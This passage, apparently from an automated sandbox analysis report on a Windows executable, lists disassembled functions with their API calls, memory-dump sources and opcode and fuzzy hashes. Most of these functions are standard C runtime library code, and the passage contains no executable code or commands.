                                                                                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2744216297-0
                                                                                                                                                                    • Opcode ID: 4d7e874283c6cb95504f8bf581d25cdc5bdada817fc289e0122a5855aae9175c
                                                                                                                                                                    • Instruction ID: add9ab68d8668fab1e3e94fca5245432b0b84d2ac2d725a73ec4eac4c7c0f831
                                                                                                                                                                    • Opcode Fuzzy Hash: 4d7e874283c6cb95504f8bf581d25cdc5bdada817fc289e0122a5855aae9175c
                                                                                                                                                                    • Instruction Fuzzy Hash: FBF01C36410215FFCF221F99EC0899A3F66FB893A0B044610FA09D5220D736C920EBB5
                                                                                                                                                                    Function 00D959A7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00D959B9
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00D959C8
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00D959D1
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D959DE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2933794660-0
                                                                                                                                                                    • Opcode ID: 4a9b54fca138cafb6b6d8c9d38896437e5ff24efe60468286345231e53ce9bab
                                                                                                                                                                    • Instruction ID: 3fd048d42cf9ee68bdd65980b4d8e58cfd0c0168de7e04e0b3f084327d96ac03
                                                                                                                                                                    • Opcode Fuzzy Hash: 4a9b54fca138cafb6b6d8c9d38896437e5ff24efe60468286345231e53ce9bab
                                                                                                                                                                    • Instruction Fuzzy Hash: 67F05F74D1120DEBCF00DBB5D94999EBBF4FF1C204BA14696A412E7210E670AB449F60
                                                                                                                                                                    Function 00DA2117 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E783: GetLastError.KERNEL32(00000000,?,00DA0AB9), ref: 00D9E787
                                                                                                                                                                      • Part of subcall function 00D9E783: SetLastError.KERNEL32(00000000,?,?,00000028,00D9B9D2), ref: 00D9E829
                                                                                                                                                                    • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D99266,?,?,?,00000055,?,-00000050,?,?,?), ref: 00DA21D6
                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D99266,?,?,?,00000055,?,-00000050,?,?), ref: 00DA220D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CodePageValid
                                                                                                                                                                    • String ID: utf8
                                                                                                                                                                    • API String ID: 943130320-905460609
                                                                                                                                                                    • Opcode ID: e193e41e2489775307f43a87395b7cd3fca473ebc8a7e00e15412f560fca1d1e
                                                                                                                                                                    • Instruction ID: ae5c7949594f4b5f91830840888e88716b847d0af1bf09dae64c2a1ed74c6bd6
                                                                                                                                                                    • Opcode Fuzzy Hash: e193e41e2489775307f43a87395b7cd3fca473ebc8a7e00e15412f560fca1d1e
                                                                                                                                                                    • Instruction Fuzzy Hash: 4051E671644301EADF25AB7E8C82BB773A8EF47700F180429FA45DB581FA74E9408675
                                                                                                                                                                    Function 0042B715 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID: #v
                                                                                                                                                                    • API String ID: 3664257935-554117064
                                                                                                                                                                    • Opcode ID: 4f59d2d48b843f9d69bb6037eb0ebbce4795cec77d6df5c080272f5459bd78a8
                                                                                                                                                                    • Instruction ID: d0e48a199c6c705821f8c8f25112402aa775e3dd908bc2a6c761a244230c4604
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f59d2d48b843f9d69bb6037eb0ebbce4795cec77d6df5c080272f5459bd78a8
                                                                                                                                                                    • Instruction Fuzzy Hash: B751CB34204B918FD712CB39C890772BBE2EF9B314B54849DD4D68FB62C73AA846CB55
                                                                                                                                                                    Function 00D9DFAC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D9DEAD,?,?,00000000,00000000,00000000,?), ref: 00D9DFD1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                    • Opcode ID: f6ee3d78a1637faf90d6eea1adf571552f88f8e76d93e165afb9615b2020703c
                                                                                                                                                                    • Instruction ID: 22e8dbb331995a9d2da1c6b2ab6a9d8e557ac5470c7d096f90a95562f24a1754
                                                                                                                                                                    • Opcode Fuzzy Hash: f6ee3d78a1637faf90d6eea1adf571552f88f8e76d93e165afb9615b2020703c
                                                                                                                                                                    • Instruction Fuzzy Hash: FF415971900209AFCF26DF98DC81AEEBBB5FF48304F188169FA08A7255D3759990DB60
                                                                                                                                                                    Function 00D9D818 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00D9DA8F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ___except_validate_context_record
                                                                                                                                                                    • String ID: csm$csm
                                                                                                                                                                    • API String ID: 3493665558-3733052814
                                                                                                                                                                    • Opcode ID: 102419de9211abfb084bc55a2ca7d810a826553bdee12a52da6912b64ccd897f
                                                                                                                                                                    • Instruction ID: 878f8de9f1826f3df382ec91e20c660a05cfaff18b1a30096e379777f80fadfd
                                                                                                                                                                    • Opcode Fuzzy Hash: 102419de9211abfb084bc55a2ca7d810a826553bdee12a52da6912b64ccd897f
                                                                                                                                                                    • Instruction Fuzzy Hash: 1331C136504218EBCF229F94CC409AA7B77FF09369F2D425AF8544A221C332DCA1DBB1
                                                                                                                                                                    Function 00D929D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • AcquireSRWLockExclusive.KERNEL32(00DB648C,ios_base::badbit set,?,?,00D91C84,00DB6478,00D91B17), ref: 00D929DF
                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(00DB648C,?,?,00D91C84,00DB6478,00D91B17), ref: 00D92A19
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                    • String ID: ios_base::badbit set
                                                                                                                                                                    • API String ID: 17069307-3882152299
                                                                                                                                                                    • Opcode ID: a5862076fc80e25f9d75d48df8f1c01409170cc107e4bed4779628d8748a3d8d
                                                                                                                                                                    • Instruction ID: 46873b7ec34e5f07ac608a7d075049dcf663c17c6794b1f2c3ddbe76d0868410
                                                                                                                                                                    • Opcode Fuzzy Hash: a5862076fc80e25f9d75d48df8f1c01409170cc107e4bed4779628d8748a3d8d
                                                                                                                                                                    • Instruction Fuzzy Hash: 90F08231600600EFCB249F18D844A757B68FB45734F14032EE896833E0C7355842DE71
                                                                                                                                                                    Function 0040B9E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                    • String ID: #v
                                                                                                                                                                    • API String ID: 3664257935-554117064
                                                                                                                                                                    • Opcode ID: 7c54cb469457635f36ad0ae8b4914aa2b457e5d6445ebac04a39c07ed6b78a77
                                                                                                                                                                    • Instruction ID: 23a19cfd90755bc3f012e3213f5be6af889070350e8c7cc38b3ff011247ab6d8
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c54cb469457635f36ad0ae8b4914aa2b457e5d6445ebac04a39c07ed6b78a77
                                                                                                                                                                    • Instruction Fuzzy Hash: 51C00279419401AFCE017B61FC199283A21BB563457050834E51990236DB2A0927DB2E